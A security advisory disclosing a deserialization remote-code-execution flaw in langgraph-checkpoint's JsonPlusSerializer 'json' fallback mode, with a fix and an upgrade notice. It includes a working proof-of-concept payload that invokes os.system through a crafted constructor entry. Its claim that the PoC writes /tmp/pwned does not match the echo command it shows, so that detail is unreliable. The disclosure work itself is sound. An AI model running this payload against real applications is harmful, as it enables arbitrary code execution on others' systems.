## Vulnerability Overview ### Vulnerability Name RCE in "json" mode of JsonPlusSerializer ### Affected Versions langgraph-checkpoint 3.0 ### Vulnerability Description Prior to version 3.0, JsonPlusSerializer in langgraph-checkpoint had a Remote Code Execution (RCE) vulnerability in its "json" serialization mode when deserializing saved payloads. If an attacker can cause the application to save a malicious payload in "json" serialization mode, arbitrary Python code can be executed during deserialization. ### Vulnerability Details Affected file: jsonplus.py When serialization with "msgpack" fails, the system falls back to "json" mode. If an attacker can trigger this fallback mode with a malicious payload, deserialization will allow execution of arbitrary functions. ### Affected Users All users of langgraph-checkpoint versions below 3.0 who: 1. Allow untrusted or user-supplied data to be saved as checkpoints. 2. Use the default serializer or JsonPlusSerializer that may fall back to "json" mode. ### Fixed Version langgraph-checkpoint 3.0.0 ### Proof of Concept (PoC) ```python from langgraph.graph import StateGraph from typing import TypedDict from langgraph.checkpoint.sqlite import SqliteSaver class State(TypedDict): foo: str attack: dict def my_node(state: State): return {"foo": "oops i fetched a surrogate \ud800"} with SqliteSaver.from_conn_string("foo.db") as saver: graph = ( StateGraph(State). add_node("my_node", my_node). add_edge("__start__", "my_node"). compile(checkpointer=saver) ) attack = { "lc": 2, "type": "constructor", "id": ["os", "system"], "kwargs": {"command": "echo pwned"} } malicious_payload = { "attack": attack, } thread_id = "00000000-0000-0000-0000-000000000001" config = {"thread_id": thread_id} graph.invoke(malicious_payload, config=config) graph.invoke({"foo": "hi there"}, config=config) ``` Running this PoC will write a file `/tmp/pwned` to disk, demonstrating code execution. ### Fix Details Introduced a whitelist for constructor deserialization, restricting allowed "id" paths to only those module/class combinations explicitly approved during serialization. ### Mitigation Immediately upgrade to langgraph-checkpoint==3.0.0.